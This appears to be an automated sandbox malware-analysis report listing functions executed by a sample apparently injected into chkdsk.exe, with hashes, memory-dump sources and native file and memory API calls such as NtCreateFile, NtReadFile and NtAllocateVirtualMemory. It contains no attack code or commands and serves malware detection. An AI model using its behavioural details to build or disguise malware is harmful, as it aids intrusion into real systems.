Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: d612d24f84e062fd41873fdbc4b1efef45b1968de666174e5df08b49a7570572
Instruction ID: ea4c92b58a5cc785b7745404a12d9f07b905d1c5543f2a397250590538678944
Opcode Fuzzy Hash: d612d24f84e062fd41873fdbc4b1efef45b1968de666174e5df08b49a7570572
Instruction Fuzzy Hash: 57811975D006699BDB25CB54CC59BEEB7B4BF48710F0441EAA90EB7280D7709E84CFA0

Analysis Process: chkdsk.exePID: 7852, Parent PID: 3340COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	2.2%
Total number of Nodes:	458
Total number of Limit Nodes:	73

Executed Functions

Function 00809320 Relevance: 39.2, Strings: 31, Instructions: 433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 0080959C
;3, xrefs: 0080962E
~, xrefs: 008094CE
{", xrefs: 00809474
_R, xrefs: 008095FC
7M, xrefs: 008093BB
K, xrefs: 0080936C
<f, xrefs: 008095AA
o, xrefs: 00809580
Hp, xrefs: 00809624
.z, xrefs: 00809460
C", xrefs: 0080961A
y,, xrefs: 00809492
*, xrefs: 008096C9
., xrefs: 008095A3
FW, xrefs: 00809431
/, xrefs: 00809427
A, xrefs: 0080956C
h, xrefs: 00809682
"t, xrefs: 0080953D
'D, xrefs: 0080955B
< , xrefs: 008096DE
0', xrefs: 0080965A
F*, xrefs: 008095D6
', xrefs: 008096BB
#, xrefs: 0080958E
nA, xrefs: 0080943B
[;, xrefs: 008095E4
#, xrefs: 00809587
, xrefs: 00809394
%, xrefs: 00809376

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID:
String ID: "t$#$#$%$'$'D$*$.$.z$0'$7M$8$;3$< $<f$A$C"$F*$FW$Hp$K$[;$_R$nA$o$y,${"$~$ $/$h
API String ID: 0-507472186
Opcode ID: 4d8f7b7195b21d81e2f76e143db5665333735b25603cb7ed8d878f259e916a5a
Instruction ID: c50820b62f3b14b83527d289d72d364d3bd105fd42f70abaef3339cad64f22bf
Opcode Fuzzy Hash: 4d8f7b7195b21d81e2f76e143db5665333735b25603cb7ed8d878f259e916a5a
Instruction Fuzzy Hash: 71329CB0D05229CBEB64CF49CC98BDDBBB1FB45308F1081D9C449AB292C7B95A89CF55

Function 0081B5C0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0081B6A4
FindNextFileW.KERNELBASE(?,00000010), ref: 0081B6DF
FindClose.KERNELBASE(?), ref: 0081B6EA

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 16a20ad5e6b8ceb47d88f4660dc3fbc92ce7833b86e08af8b03ac43903ca680d
Instruction ID: 61003698b314da0f93e223da5f2af1d8965156a8f4a38b7323fa2aac6397a9fd
Opcode Fuzzy Hash: 16a20ad5e6b8ceb47d88f4660dc3fbc92ce7833b86e08af8b03ac43903ca680d
Instruction Fuzzy Hash: 3D315071A00358BBDB20DB64CC86FFA77BCEF64704F144459B909E6181DB70AAC48BA1

Function 00827450 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0082753D

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
Instruction ID: 2b713423c57d1bde7e04982c55867a00046daefca9757b0794257e03c2b146ca
Opcode Fuzzy Hash: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
Instruction Fuzzy Hash: 7931B2B5A01608AFDB04DF98D881EEEB7F9EF8C714F108219F918A3240D670A951CBA5

Function 008275B0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00827685

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
Instruction ID: 2af49145ad4833c0f831fbdbc1688527a5a381cb3946e028d117a4f759f27152
Opcode Fuzzy Hash: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
Instruction Fuzzy Hash: 1E310A75A00619AFDB14DF99D841EEF77B9EF8C310F108609FD18A7240D770A8118BA5

Function 00827880 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0081118B,?,008264E7,00000000,00000004,00003000,?,?,?,?,?,008264E7,0081118B,0081FF61,008264E7,00000000), ref: 00827937

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
Instruction ID: 5e859e7cbe85e0d5bcfb2bc98b176d267d47f1fa684ad1fc090d25e885ef750d
Opcode Fuzzy Hash: f359f5d82faebaccd4494c43b8bee9817ba5ff76922e437d83e4df8c04e1250b
Instruction Fuzzy Hash: 192116B5A00618AFDB10DF58DC41EAFB7A9FF88710F008509FD18A7281D774A850CBA5

Function 00827690 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 00827718

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
Instruction ID: d3a9e9c5bc22d2aef8624a1699846325a3111e106fbdf5a0762841ccc5e998a4
Opcode Fuzzy Hash: fef99ae8805eda17e1b638b3292ed56224c9cd73c8a113fc9df4491e960a74b9
Instruction Fuzzy Hash: C801A175600614BFE610EA68EC46FAB73ACEB85720F408509FA58A71C1D6B0791087E6

Function 00827720 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00827754

Memory Dump Source

Source File: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_800000_chkdsk.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction ID: e08920ee703a88aa1840b66f3e5c96e57e03fa320f4ebde2a582fbb5224bccae
Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction Fuzzy Hash: D9E04F352002147BD610AA69DC01FD7776DEFC5760F404419FA08A7182CA70791186F5

Function 052335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052335CA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f25fc3c54f4dcfaaebcffcc13dd736a7689d7eaf245bbeb0411758bfc4de8300
Instruction ID: fc077a0ce4d52ee53cfa99a604f53bbe044e1ec80deda29d39da54c83bb6e7a7
Opcode Fuzzy Hash: f25fc3c54f4dcfaaebcffcc13dd736a7689d7eaf245bbeb0411758bfc4de8300
Instruction Fuzzy Hash: 8090023262551402D1047158455470610158BD0201FA5C411A1424568D87D58A5169A2

Function 05234650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0523465A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9aa0813022ac19d03eb8b37b5d40d4e784eb6541671356662bfc764afbf447e
Instruction ID: f92da473a233aa2714567a99f7ed5cd90025671983beb12a532ed3e3fec07dae
Opcode Fuzzy Hash: e9aa0813022ac19d03eb8b37b5d40d4e784eb6541671356662bfc764afbf447e
Instruction Fuzzy Hash: E19002626215104241447158484440660159BE13013D5C115A1554560C869889559669

Function 05234340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0523434A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0636c0683db8dc7c427a553102b2e8e6d9dd48f0030292b1b5f2fb1a75f16c56
Instruction ID: 33d0c36e4abcc10f4c462dbd19174ed328046615c7153309ebff5abd78606f5b
Opcode Fuzzy Hash: 0636c0683db8dc7c427a553102b2e8e6d9dd48f0030292b1b5f2fb1a75f16c56
Instruction Fuzzy Hash: 1D900232625810129144715848C454640159BE0301B95C011E1424554C8A948A565761

Function 05232D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232D3A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 76028f3887ada302ff0f56eb9010d1d311c6970472cda5deb765f28a0005b7db
Instruction ID: d1d2abb2b1a8ce64bc9799bbaabb122bd1bd990c54de5fe4b6a0f4a77384aa4b
Opcode Fuzzy Hash: 76028f3887ada302ff0f56eb9010d1d311c6970472cda5deb765f28a0005b7db
Instruction Fuzzy Hash: 6090022232141003D144715854586064015DBE1301F95D011E1414554CD99589565622

Function 05232D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232D1A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 296caa9db9c14ce0b927523d5b2699c055b1b44f0ba9a1a2a483ffd1ac97e49b
Instruction ID: 4302f87a58ebc0df26c71c92187904d10383ab3f4df02db86f47c839382d8dc2
Opcode Fuzzy Hash: 296caa9db9c14ce0b927523d5b2699c055b1b44f0ba9a1a2a483ffd1ac97e49b
Instruction Fuzzy Hash: AA90022A23341002D1847158544860A00158BD1202FD5D415A1015558CC99589695721

Function 05232DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232DFA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d67b29e68040d740393e64555d7a64166a2da63dc8b85a8feeb286c746bd8321
Instruction ID: 584190fe30289b8045570b4b5bbcd1a7ca030becaefd86df2e6a169b22722ee6
Opcode Fuzzy Hash: d67b29e68040d740393e64555d7a64166a2da63dc8b85a8feeb286c746bd8321
Instruction Fuzzy Hash: 0E90023222141413D1157158454470700198BD0241FD5C412A1424558D96D68A52A521

Function 05232DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232DDA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ee756c15393ec4185da392e090057d8fa7f80c8b51a8f1ef94c7bb296f4ffde
Instruction ID: 8008e903f8143b393c3d10eeba8ef65fe290d708084082c13bfabbb244cc52b0
Opcode Fuzzy Hash: 1ee756c15393ec4185da392e090057d8fa7f80c8b51a8f1ef94c7bb296f4ffde
Instruction Fuzzy Hash: A0900222262451525549B158444450740169BE02417D5C012A2414950C85A69956DA21

Function 05232C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C6A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0bba0273b94ab52de4e7ec5f8aea95fbba88d3879f8f7362943c286a41d6bee7
Instruction ID: 0351d6bdf1531f089f64bc7fb86424df6828d3951a0d209b40829396d5a42bf1
Opcode Fuzzy Hash: 0bba0273b94ab52de4e7ec5f8aea95fbba88d3879f8f7362943c286a41d6bee7
Instruction Fuzzy Hash: 9490023222141842D10471584444B4600158BE0301F95C016A1124654D8695C9517921

Function 05232C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C7A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 56f44e7fe8bdca4d9072dc642286e2f473877f9a64aa67845d65ec79501c1cad
Instruction ID: 78fa49d57875ea32cd48eecffb87355e31b9c08a1462200dfb9a6726efc0e13f
Opcode Fuzzy Hash: 56f44e7fe8bdca4d9072dc642286e2f473877f9a64aa67845d65ec79501c1cad
Instruction Fuzzy Hash: BC90023222149802D1147158844474A00158BD0301F99C411A5424658D86D589917521

Function 05232CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232CAA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f665017b5defc5a66c5cd53a62d519476af5931c6e64c80b9e9acf44fe4ef61
Instruction ID: d8e04adcef724dddcffd7dddfe8e181d536536bad7596c9bc625fa136e69fbd1
Opcode Fuzzy Hash: 6f665017b5defc5a66c5cd53a62d519476af5931c6e64c80b9e9acf44fe4ef61
Instruction Fuzzy Hash: 3090023222141402D1047598544864600158BE0301F95D011A6024555EC6E589916531

Function 05232F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232F3A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24c1f4f0813b396b2a0f29b757d3cc67b50c18a97accd5bb973e45ddb1ab34fa
Instruction ID: c60704f0016d840ff75021d26f8bce819ad733f0a0e8be37753e76952bd632c8
Opcode Fuzzy Hash: 24c1f4f0813b396b2a0f29b757d3cc67b50c18a97accd5bb973e45ddb1ab34fa
Instruction Fuzzy Hash: 2E90026236141442D10471584454B060015CBE1301F95C015E2064554D8699CD526526

Function 05232FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232FBA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ca6c0a71d639fe327337f36f0a5c559e3e9a4f708598cf886653b70726b6c2c
Instruction ID: 1ed4d940839df97ba4d78b69e995233f4669c79034b80c9e50ac9d951e1f94b1
Opcode Fuzzy Hash: 4ca6c0a71d639fe327337f36f0a5c559e3e9a4f708598cf886653b70726b6c2c
Instruction Fuzzy Hash: B0900222621410424144716888849064015AFE1211795C121A1998550D85D989655A65

Function 05232FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232FEA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4478f275df577f01a5a319ca70c367fd569981b7f7681a8e0fae55ec454bedec
Instruction ID: 79856831c524f6430a384a90aeee256a6e1905419e05374c84c30e804de84022
Opcode Fuzzy Hash: 4478f275df577f01a5a319ca70c367fd569981b7f7681a8e0fae55ec454bedec
Instruction Fuzzy Hash: BC900222231C1042D20475684C54B0700158BD0303F95C115A1154554CC99589615921

Function 05232E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232E8A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d24f0abad12f81374bf409c15e0a1445b5deb4c05cb0f2541aed33ab3084d17
Instruction ID: 01508d620cd5c55ede63c2765f2d26c7509b98d7590e54971e29fa9ca1a1f26f
Opcode Fuzzy Hash: 2d24f0abad12f81374bf409c15e0a1445b5deb4c05cb0f2541aed33ab3084d17
Instruction Fuzzy Hash: 3890022262141502D10571584444616001A8BD0241FD5C022A2024555ECAA58A92A531

Function 05232EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232EEA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85cc49169f2d9c70509fe2f4daee268a3c713ad85739d6eeb03d01110024e3ac
Instruction ID: d7981cadc8be8d2bbb1ae75deed18a6de04d21f66c6fab4c597c38e18a4af177
Opcode Fuzzy Hash: 85cc49169f2d9c70509fe2f4daee268a3c713ad85739d6eeb03d01110024e3ac
Instruction Fuzzy Hash: 4C90026222181403D1447558484460700158BD0302F95C011A3064555E8AA98D516535

Function 052339B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052339BA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d4aa811c4fc39784c0818451d6654792bf3049817c99df50f93e5a04b0b96ac
Instruction ID: 5f6a8951257cda10547c7151060aeb78ea87453e0feae21bb24c5506a6b166e3
Opcode Fuzzy Hash: 8d4aa811c4fc39784c0818451d6654792bf3049817c99df50f93e5a04b0b96ac
Instruction Fuzzy Hash: 0E90022226546102D154715C44446164015ABE0201F95C021A1814594D85D589556621

Function 05232B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232B6A

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ebf8dedb35e7944a7465ef1675395091db97289faef8bc33cc4cb0eb8dd5032
Instruction ID: 851f1996aefc9d48660b37a2922dfc1b5fdd5c31be1afe23805d303e25eea9dd
Opcode Fuzzy Hash: 8ebf8dedb35e7944a7465ef1675395091db97289faef8bc33cc4cb0eb8dd5032
Instruction Fuzzy Hash: 2090026222241003410971584454616401A8BE0201B95C021E2014590DC5A589916525

Function 05232BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232BAA

Memory Dump Source

Source File: 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 0000000C.00000002.4131036726.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_51c0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39c06992964a27d860058864231fa8d05fb18a400db3b0213522729f011fa0e1
